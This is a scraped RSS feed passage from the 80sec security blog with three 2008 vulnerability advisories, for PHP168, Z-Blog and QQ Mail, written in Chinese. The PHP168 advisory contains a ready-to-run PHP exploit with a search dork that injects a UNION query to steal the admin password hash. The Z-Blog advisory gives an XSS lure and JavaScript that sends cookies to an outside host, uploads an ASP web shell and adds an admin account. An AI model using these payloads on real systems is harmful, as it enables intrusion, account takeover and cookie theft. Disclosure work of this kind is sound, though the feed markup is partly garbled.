]]> http://www.80sec.com/mysql-injection-ids-ver10.html/feed PHP 168 SQL注射漏洞 http://www.80sec.com/php168-sql-injetion.html http://www.80sec.com/php168-sql-injetion.html#comments Fri, 11 Jul 2008 09:31:46 +0000 admin http://www.80sec.com/?p=24 get_one("SELECT keywords AS keyword FROM {$pre}article WHERE aid='$id'")); } if($keyword){ $SQL.=" AND ( "; $keyword=urldecode($keyword); $detail=explode(" ",$keyword); unset($detail2); foreach( $detail AS $key=>$value){ $detail2[]=” BINARY title LIKE ‘%$value%’ “; } $str=implode(” OR “,$detail2); $SQL.=” $str ) “; }else{ $SQL.=” AND 0 “; } $ORDER=’ list ‘; } if(!$webdb[viewNoPassArticle]){ $SQL.=’ AND yz=1 ‘; } $SQL=” WHERE $SQL ORDER BY $ORDER DESC LIMIT $rows”; $which=’*'; $listdb=list_article($SQL,$which,$leng); keyword被urldecode然后进入list_article函数,提交%2527将导致一个’进入SQL查询 在artic_function.php中的list_article函数如下 function list_article($SQL,$which='*',$leng=40){ global $db,$pre; $query=$db->query("SELECT $which FROM [...]]]> 漏洞说明:历经数年开发与完善的”PHP168整站系统”是国内最早的多功能模块化网站管理软件系统;不仅适合于建设一般的企业、政府、学校、个人等小型网站,同时也适合于建设地区门户、行业门户、收费网站等大中型网站,80sec在其产品中发现了一个严重的SQL注射漏洞,可能被恶意用户查询数据库的敏感信息,如管理员密码,加密key等等,从而控制整个网站。

漏洞厂商:http://www.php168.com

漏洞解析:在系统的jsarticle.php中,使用了urldecode用来解码用户提交的数据,但是在使用该函数之后并没有做进一步的有效性验证,从而导致精心构造的数据可以饶过系统的过滤以及php的Magic Quote保护,漏洞部分代码如下:


elseif($type=='like')
{

$SQL.=" AND aid!='$id' ";

if(!$keyword)
{
extract($db->get_one("SELECT keywords AS keyword FROM {$pre}article WHERE aid='$id'"));
}

if($keyword){
$SQL.=" AND ( ";
$keyword=urldecode($keyword);
$detail=explode(" ",$keyword);
unset($detail2);
foreach( $detail AS $key=>$value){
$detail2[]=” BINARY title LIKE ‘%$value%’ “;
}
$str=implode(” OR “,$detail2);
$SQL.=” $str ) “;
}else{
$SQL.=” AND 0 “;
}

$ORDER=’ list ‘;
}

if(!$webdb[viewNoPassArticle]){
$SQL.=’ AND yz=1 ‘;
}

$SQL=” WHERE $SQL ORDER BY $ORDER DESC LIMIT $rows”;
$which=’*';
$listdb=list_article($SQL,$which,$leng);

keyword被urldecode然后进入list_article函数,提交%2527将导致一个’进入SQL查询

在artic_function.php中的list_article函数如下


function list_article($SQL,$which='*',$leng=40){
global $db,$pre;
$query=$db->query("SELECT $which FROM {$pre}article $SQL");
while( $rs=$db->fetch_array($query) ){
if($rs[mid]){
$_rss=$db->get_one(”SELECT * FROM {$pre}article_content_{$rs[mid]} WHERE aid=’$rs[aid]‘ LIMIT 1″);
$_rss && $rs=$rs+$_rss;
}
$rs[content]=@preg_replace(’/<([^<]*)>/is’,”",$rs[content]); //把HTML代码过滤掉
//如果文章有短标题,将以此显示在文章列表
if($rs[smalltitle]){
$title=$rs[smalltitle];
}else{
$title=$rs[title];
}
$rs[title]=get_word($rs[full_title]=$title,$leng);
if($rs[titlecolor]||$rs[fonttype]){
$titlecolor=$rs[titlecolor]?”color:$rs[titlecolor];”:”;
$font_weight=$rs[fonttype]==1?’font-weight:bold;’:”;
$rs[title]=”$rs[title]“;
}
$rs[posttime]=date(”Y-m-d”,$rs[full_posttime]=$rs[posttime]);
if($rs[picurl]){
$rs[picurl]=tempdir($rs[picurl]);
}
$listdb[]=$rs;
}
return $listdb;
}

直接进入SQl查询,导致注射漏洞的产生。

漏洞利用:80sec提供攻击测试代码如下:


#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Php168 v2008 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168 V2008"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to php168
Example:
php '.$argv[0].' localhost /php168/
+---------------------------------------------------------------------------+
');
exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$resp = send();
preg_match('/([a-z0-9]+)_article/', $resp, $pre);

if ($pre)
$resp = send();
else
exit("Exploit Failed!\n");

preg_match('/content_([\S]+)\|([a-z0-9]{32})/', $resp, $pwd);

if ($pwd)
exit("Expoilt Success!\nadmin:\t$pwd[1]\nPassword(md5):\t$pwd[2]\n");
else
exit("Exploit Failed!\n");

function send()
{
global $host, $path, $pre;

if ($pre)
$cmd = 'type=like&keyword=%2527)/**/UNION/**/SELECT/**/1,1,1,1,CONCAT(username,%2527|%2527,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/'.$pre[1].'_members/**/WHERE/**/uid=1%23';
else
$cmd = 'type=like&keyword=%2527';

$message = "POST ".$path."jsarticle.php HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;

$fp = fsockopen($host, 80);
fputs($fp, $message);

$resp = '';

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

return $resp;
}

?>

漏洞状态:已经通知php168官方,官方已经发布补丁。

]]> http://www.80sec.com/php168-sql-injetion.html/feed Z-blog跨站脚本攻击漏洞 http://www.80sec.com/zbog-xss.html http://www.80sec.com/zbog-xss.html#comments Wed, 09 Jul 2008 14:56:17 +0000 admin http://www.80sec.com/?p=23 … 精心构造url参数将能构造一个url类型的非持久xss如下: http://127.0.0.1/Z-Blog18/FUNCTION/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1×2x7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex 上述url访问之后将引入127.0.0.1/1.js执行,其中可以写任意js代码。 而z-blog的所有安全设计全部用来抵御前台的攻击,对于后台基本没有任何限制,加上antispam功能对用户提交的url连接类似于加密处理,所以很容易就可以诱惑别人访问上述的xss攻击url,可以发表评论如下: 看这个站,有新东西? [URL=http://www.foo.com/function/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1x2x7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex]http://www.80sec.com[/URL] 用户看到的是http://www.80sec.com这个信任的站点,而一旦点击将在www.foo.com域执行恶意用户指定的js,在该js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向,整个过程很难发现攻击的意图,80sec提供js如下: xmlhttp=poster(); cookie=document.cookie; login=cookie.indexOf('password')==-1?0:1; tolocation='http://www.80sec.com/'; //get cookie x=new Image(); x.src="http://www.80sec.com/c.php?c="+escape(document.cookie); //get a shell data="txaContent=“; postmydata(”http://www.0×37.com/cmd.asp?act=SiteFilePst&path=%2E%2FUPLOAD%2Findex%2Easp&opath=”,data); //add a user data=”edtID=0&edtLevel=2&edtName=xss2root&edtPassWord=d073d5454ffe92bdcd3cbcb77d149df5&edtPassWordRe=xss2root&edtEmail=null@null.com&edtHomePage=&edtAlias=”; postmydata(”http://www.0×37.com/cmd.asp?act=UserCrt”,data); //fool the user window.location=tolocation; function poster(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { [...]]]> 漏洞说明:Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http://www.rainbowsoft.org/。Z-blog代码严谨,前台功能简洁,后台功能强大,这为它的产品安全带来很大的优势,但是80sec在产品中发现一个严重的跨站脚本攻击漏洞,加上产品设计上的一些问题可能带来严重的后果。

漏洞厂商:http://www.rainbowsoft.org/

漏洞解析:在FUNCTION/c_urlredirect.asp中,程序对提交的url参数做如下处理

strUrl=URLDecodeForAntiSpam(Request.QueryString("url"))

其中URLDecodeForAntiSpam是防止垃圾连接的解码函数,其函数处理如下


Function URLDecodeForAntiSpam(strUrl)

Dim i,s
For i =1 To Len(strUrl) Step 2
s=s & Mid(strUrl,i,1)
Next
URLDecodeForAntiSpam=s

End Function

在做如上处理之后程序将在c_urlredirect.asp输出url参数


...
<meta http-equiv="refresh" content="0;URL=<%Response.Write strUrl%>“/>

精心构造url参数将能构造一个url类型的非持久xss如下:

http://127.0.0.1/Z-Blog18/FUNCTION/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1×2x7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex

上述url访问之后将引入127.0.0.1/1.js执行,其中可以写任意js代码。

而z-blog的所有安全设计全部用来抵御前台的攻击,对于后台基本没有任何限制,加上antispam功能对用户提交的url连接类似于加密处理,所以很容易就可以诱惑别人访问上述的xss攻击url,可以发表评论如下:

看这个站,有新东西?
[URL=http://www.foo.com/function/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1x2x7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex]http://www.80sec.com[/URL]


用户看到的是http://www.80sec.com这个信任的站点,而一旦点击将在www.foo.com域执行恶意用户指定的js,在该js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向,整个过程很难发现攻击的意图,80sec提供js如下:


xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexOf('password')==-1?0:1;
tolocation='http://www.80sec.com/';

//get cookie
x=new Image();
x.src="http://www.80sec.com/c.php?c="+escape(document.cookie);

//get a shell
data="txaContent=<%25execute(request(%22a%22))%25>“;
postmydata(”http://www.0×37.com/cmd.asp?act=SiteFilePst&path=%2E%2FUPLOAD%2Findex%2Easp&opath=”,data);

//add a user data=”edtID=0&edtLevel=2&edtName=xss2root&edtPassWord=d073d5454ffe92bdcd3cbcb77d149df5&edtPassWordRe=xss2root&edtEmail=null@null.com&edtHomePage=&edtAlias=”;
postmydata(”http://www.0×37.com/cmd.asp?act=UserCrt”,data);

//fool the user
window.location=tolocation;

function poster(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType(’text/xml’);
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}

function postmydata(action,data){
xmlhttp.open("POST", action, false);
xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlhttp.send(data);
return xmlhttp.responseText;
}

漏洞状态:已经联系官方,请等待官方公告。

]]> http://www.80sec.com/zbog-xss.html/feed QQ Mail跨站脚本漏洞 http://www.80sec.com/qqmail-xss.html http://www.80sec.com/qqmail-xss.html#comments Mon, 07 Jul 2008 04:41:55 +0000 admin http://www.80sec.com/?p=22 &lt;img src="http://src=" onerror="alert(x111)"&gt;</div> 漏洞解析: QQ Mail会自动解析邮件内容,发现匹配的链接将转换成HTML内容,由LinkMaker函数实现: function LinkMaker( str ) { return str.replace( /(https?:\/\/[\w.]+[^ \f\n\r\t\v\"\\\<\>\[\]\u2100-\uFFFF]*)|([a-zA-Z_0-9.-]+@[a-zA-Z_0-9.-]+\.\w+)/ig, function( s, v1, v2 ) { if ( v2 ) return [ '<a href="mailto:', v2, '">', v2, '</a>' ].join( “” ); else return [ '<a href="', s, '">', s, '</a>' ].join( “” ); } ); SwapImg函数处理邮件中IMG标签: function SwapImg(id, ajustValue) { var as = GelTags("img", S(id)); for (var i = 0; [...]]]> 漏洞说明:QQ Mail是Tencent公司提供的webmail服务,你可以使用你的QQ帐户来登陆使用Mail服务,具体的信息可以访问http://mail.qq.com/。但是80sec团队成员在QQ Mail里发现存在跨站脚本漏洞,恶意用户可以通过该漏洞在邮件里伪造登陆表单窃取目标用户的密码以及偷取Cookie以取得其他用户的身份,或者使用ajax等技术读取用户的敏感信息。

漏洞成因:QQ Mail的Javascript Dom部分在处理邮件内容,对邮件内容字符串的处理分为str和code两个流程,通过组合的标签内容可以误导Javascript处理图片内容和文字链接进入str流程,将HTML编码字符串还原为HTML标签。

漏洞测试:(已经修复)

发送如下内容即可引发XSS


<div>&lt;img src="http://src=" onerror="alert(x111)"&gt;</div>

漏洞解析:

QQ Mail会自动解析邮件内容,发现匹配的链接将转换成HTML内容,由LinkMaker函数实现:


function LinkMaker( str ) {
return str.replace( /(https?:\/\/[\w.]+[^ \f\n\r\t\v\"\\\<\>\[\]\u2100-\uFFFF]*)|([a-zA-Z_0-9.-]+@[a-zA-Z_0-9.-]+\.\w+)/ig, function( s, v1, v2 ) {
if ( v2 )
return [ '<a href="mailto:', v2, '">', v2, '</a>' ].join( “” );
else
return [ '<a href="', s, '">', s, '</a>' ].join( “” );
} );

SwapImg函数处理邮件中IMG标签:


function SwapImg(id, ajustValue)
{
var as = GelTags("img", S(id));
for (var i = 0; i < as.length; i++)
{
if (as[i].src)
{
ZoomImgToBody(as[i], ajustValue);
as[i].onload = function()
{
ZoomImgToBody(this, ajustValue, true);
};
}
}
}

进入str流程将会使用DOM中的innerText和textContent处理字符串,邮件中的HTML编码字符串转成HTML标签(&lt;将转换成”<”,&gt;将转换成”>”),如下的测试:


<div id="contentDiv" class="body"><div>&nbsp;</div>
<div>&lt;img src="" onerror="alert(1);"&gt;</div></div>
<script>
v=document.getElementById("contentDiv").innerText; //ie
//v=document.getElementById("contentDiv").textContent; //FIREFOX
alert(v)
</script>

漏洞状态:

80sec于7.4号发现此漏洞
80sec于7.4号通知官方
Tencent于7.4号修复此漏洞
80sec于7.7号发布此漏洞公告

漏洞解决:

QQ Mail已经修补漏洞,转义字符串中的”<” ,”>”.

修改js在http://res.mail.qq.com/zh_CN/htmledition20080626/js/all.js


var str = obj.nodeValue.replace(/</g,"&lt;").replace(/>/g,"&gt;"); //1993行

建议程序员使用DOM中的元素的时候要注意安全问题,这些元素还是由用户输入中带来的,使用之前还是需要过滤。

感谢幻影dummy和luoluo提供和调试该漏洞。

]]> http://www.80sec.com/qqmail-xss.html/feed